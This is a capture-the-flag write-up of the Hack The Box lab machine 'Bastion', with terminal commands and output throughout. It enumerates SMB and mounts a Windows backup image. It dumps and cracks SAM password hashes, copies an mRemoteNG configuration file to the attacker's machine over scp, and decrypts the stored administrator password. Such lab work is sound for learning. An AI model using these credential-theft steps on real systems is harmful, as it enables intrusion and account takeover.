Bastion

From Luniwiki
Jump to: navigation, search

Back

Bastion01.png

Ports scan

u505@kali:~/HTB/Machines/Bastion$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.134 --rate=1000
[sudo] password for u505:

Starting masscan 1.0.5 at 2020-02-22 15:31:23 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 47001/tcp on 10.10.10.134 Discovered open port 135/tcp on 10.10.10.134 Discovered open port 49668/tcp on 10.10.10.134 Discovered open port 49670/tcp on 10.10.10.134 Discovered open port 49667/tcp on 10.10.10.134 Discovered open port 49666/tcp on 10.10.10.134 Discovered open port 49664/tcp on 10.10.10.134 Discovered open port 139/tcp on 10.10.10.134 Discovered open port 22/tcp on 10.10.10.134 Discovered open port 49669/tcp on 10.10.10.134 Discovered open port 49665/tcp on 10.10.10.134 Discovered open port 5985/tcp on 10.10.10.134 Discovered open port 445/tcp on 10.10.10.134
u505@kali:~/HTB/Machines/Bastion$ nmap -sC -sV 10.10.10.134
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-22 10:31 EST
Nmap scan report for bastion.htb (10.10.10.134)
Host is up (0.039s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE      VERSION
22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results: |_clock-skew: mean: -19m01s, deviation: 34m37s, median: 57s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: Bastion | NetBIOS computer name: BASTION\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2020-02-22T16:32:36+01:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-02-22T15:32:38 |_ start_date: 2020-02-22T15:15:33
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.12 seconds

Nmap on missing ports dicovered by masscan

u505@kali:~/HTB/Machines/Bastion$ nmap -sC -sV -p 5985,49666,49669,47001,49670,49664,49668,49665,49667 10.10.10.134
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-22 10:41 EST
Nmap scan report for bastion.htb (10.10.10.134)
Host is up (0.039s latency).

PORT STATE SERVICE VERSION 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 55.71 seconds

Port 445

Nmap discover shares

Nmpa doesn't discover any share.

u505@kali:~/HTB/Machines/Bastion$ nmap -p 445 --script=smb-enum-shares 10.10.10.134
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-22 10:36 EST
Nmap scan report for bastion.htb (10.10.10.134)
Host is up (0.039s latency).

PORT STATE SERVICE 445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 15.69 seconds

Nullinux

This script doesn't provide any usefull information neither.

u505@kali:~/HTB/Machines/Bastion$ python3 /opt/utils/nullinux/nullinux.py -v bastion.htb

Starting nullinux v5.4.1 | 02-22-2020 10:38


[*] Enumerating Shares for: bastion.htb Shares Comments -------------------------------------------
[-] No Shares Detected
[*] Enumerating Domain Information for: bastion.htb [-] Could not attain Domain SID
[*] Enumerating querydispinfo for: bastion.htb
[*] Enumerating enumdomusers for: bastion.htb
[*] Enumerating LSA for: bastion.htb
[*] Performing RID Cycling for: bastion.htb [-] RID Failed: Could not attain Domain SID
[*] Testing bastion.htb for Known Users
[*] Enumerating Group Memberships for: bastion.htb
[*] 0 unique user(s) identified

smbmap

smbmap provides more information.

u505@kali:~/HTB/Machines/Bastion$ smbmap -u anonymous -H 10.10.10.134
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.134...
[+] IP: 10.10.10.134:445        Name: bastion.htb                               
        Disk                                                    Permissions    Comment
        ----                                                    -----------    -------
        ADMIN$                                                  NO ACCESS      Remote Admin
        Backups                                                 READ, WRITE
        [!] Unable to remove test directory at \\10.10.10.134\BackupsvAmwsJkyfR, please remove manually
        C$                                                      NO ACCESS      Default share
        .
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    InitShutdown
        fr--r--r--                4 Sun Dec 31 19:03:58 1600    lsass
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    ntsvcs
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    scerpc
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-2dc-0
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    epmapper
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-1c8-0
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    LSM_API_service
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    eventlog
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-35c-0
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    atsvc
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-3b0-0
        fr--r--r--                4 Sun Dec 31 19:03:58 1600    wkssvc
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    spoolss
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-5e0-0
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    trkwks
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    W32TIME_ALT
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    openssh-ssh-agent
        fr--r--r--                4 Sun Dec 31 19:03:58 1600    srvsvc
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    vgauth-service
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-590-0
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-24c-0
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-244-0
        IPC$                                                    READ ONLY      Remote IPC

smbclient

u505@kali:~/HTB/Machines/Bastion$ smbclient //bastion/Backups
Enter WORKGROUP\u505's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Feb 22 10:43:14 2020
  ..                                  D        0  Sat Feb 22 10:43:14 2020
  nmap-test-file                      A      260  Sat Feb 22 10:37:21 2020
  note.txt                           AR      116  Tue Apr 16 06:10:09 2019
  SDT65CB.tmp                         A        0  Fri Feb 22 07:43:08 2019
  vAmwsJkyfR                          D        0  Sat Feb 22 10:43:14 2020
  WindowsImageBackup                  D        0  Fri Feb 22 07:44:02 2019

7735807 blocks of size 4096. 2763043 blocks available smb: \> get note.txt getting file \note.txt of size 116 as note.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)

The note tell us to avoid to download the full backup to avoid to DoS ourselves.

u505@kali:~/HTB/Machines/Bastion$ cat note.txt

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

Mount the share file

u505@kali:~/HTB/Machines/Bastion$ mkdir mountpoint
u505@kali:~/HTB/Machines/Bastion$ sudo mount -t cifs -o username=anonymous //bastion/Backups mountpoint
Password for anonymous@//bastion/Backups:

Backup of a computer

A full backup of a computer is found in the share drive

u505@kali:~/HTB/Machines/Bastion/mountpoint/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351$ ls -ltr
total 5330560
-rwxr-xr-x 1 root root   37761024 Feb 22  2019 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
-rwxr-xr-x 1 root root 5418299392 Feb 22  2019 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
-rwxr-xr-x 1 root root    2374620 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
-rwxr-xr-x 1 root root       2894 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
-rwxr-xr-x 1 root root       1488 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
-rwxr-xr-x 1 root root       3988 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
-rwxr-xr-x 1 root root       7110 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
-rwxr-xr-x 1 root root       3844 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
-rwxr-xr-x 1 root root       1484 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
-rwxr-xr-x 1 root root       6542 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
-rwxr-xr-x 1 root root       1078 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
-rwxr-xr-x 1 root root       1186 Feb 22  2019 BackupSpecs.xml
-rwxr-xr-x 1 root root       8930 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml

mount vhd file

u505@kali:~/HTB/Machines/Bastion$ mkdir -p smb/vhd
u505@kali:~/HTB/Machines/Bastion/mountpoint/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351$ guestmount --add "/home/u505/HTB/Machines/Bastion/mountpoint/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd" --inspector --ro /home/u505/HTB/Machines/Bastion/smb/vhd -v
u505@kali:~/HTB/Machines/Bastion$ df -h /opt/HTB/Machines/Bastion/smb/vhd
Filesystem      Size  Used Avail Use% Mounted on
/dev/fuse        15G  7.4G  7.6G  50% /opt/HTB/Machines/Bastion/smb/vhd

Alternative (and faster) way to mount vhd file

u505@kali:~/HTB/Machines/Bastion$ sudo modprobe nbd
[sudo] password for u505:
u505@kali:~/HTB/Machines/Bastion$ sudo qemu-nbd -r -c /dev/nbd0 "/home/u505/HTB/Machines/Bastion/mountpoint/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd"
u505@kali:~/HTB/Machines/Bastion$ sudo mount -r /dev/nbd0p1 smb/vhd/
u505@kali:~/HTB/Machines/Bastion$ df -h /opt/HTB/Machines/Bastion/smb/vhd
Filesystem      Size  Used Avail Use% Mounted on
/dev/nbd0p1      15G  7.4G  7.6G  50% /opt/HTB/Machines/Bastion/smb/vhd

Copy the SAM from the backup

u505@kali:~/HTB/Machines/Bastion/smb/vhd/Windows/System32/config$ cp SAM SYSTEM ../../../../
u505@kali:~/HTB/Machines/Bastion/smb$ samdump2 SYSTEM SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
u505@kali:~/HTB/Machines/Bastion/smb$ samdump2 SYSTEM SAM > hash.txt
u505@kali:~/HTB/Machines/Bastion/smb$ hashcat -m 1000 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
u505@kali:~/HTB/Machines/Bastion/smb$ hashcat -m 1000 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
31d6cfe0d16ae931b73c59d7e0c089c0:
26112010952d963c8dc4217daec986d9:bureaulampje

Unmount vhd drive

u505@kali:~/HTB/Machines/Bastion$ sudo umount /opt/HTB/Machines/Bastion/smb/vhd

If vhd image has been mounted with qemu-nbd then disconnect

u505@kali:~/HTB/Machines/Bastion$ sudo qemu-nbd -d /dev/nbd0
/dev/nbd0 disconnected

Unmount the share

u505@kali:~/HTB/Machines/SwagShop$ sudo umount /opt/HTB/Machines/Bastion/mountpoint

User flag

u505@kali:~/HTB/Machines/Bastion/smb$ ssh L4mpje@bastion.htb
The authenticity of host 'bastion.htb (10.10.10.134)' can't be established.
ECDSA key fingerprint is SHA256:ILc1g9UC/7j/5b+vXeQ7TIaXLFddAbttU86ZeiM/bNY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'bastion.htb,10.10.10.134' (ECDSA) to the list of known hosts.
L4mpje@bastion.htb's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>cd Desktop
l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt
<USER_FLAG>

rRemoteNG credentials

mRemoteNG stores passwords in configuration on user profile. There is a master password, but it is not used to encrypt the passwords,...

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>scp confCons.xml u505@10.10.14.6:/home/u505/HTB/Machines/Bastion/confCons.xml
The authenticity of host '10.10.14.6 (10.10.14.6)' can't be established.
ECDSA key fingerprint is SHA256:ul2yK4MycGHJVeGXwtf6Uts1TELbRlDwqXUxP/9K9m4.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.14.6' (ECDSA) to the list of known hosts.
u505@10.10.14.6's password:
confCons.xml                                                                      100% 6316   132.2KB/s   00:00

Bastion02.png

In the configuration file, there is 2 sets of credentials, Adminsitrator and the well known L4mpje.

u505@kali:~/HTB/Machines/Bastion$ python /opt/utils/mRemoteNG-Decrypt/mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2
u505@kali:~/HTB/Machines/Bastion$ python /opt/utils/mRemoteNG-Decrypt/mremoteng_decrypt.py -s ="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB"
Password: bureaulampje

Root Flag

u505@kali:~/HTB/Machines/Bastion$ ssh administrator@bastion.htb
administrator@bastion.htb's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

administrator@BASTION C:\Users\Administrator>whoami bastion\administrator administrator@BASTION C:\Users\Administrator>type Desktop\root.txt <ROOT_FLAG>

References

Daniel Simao 10:28, 22 February 2020 (EST)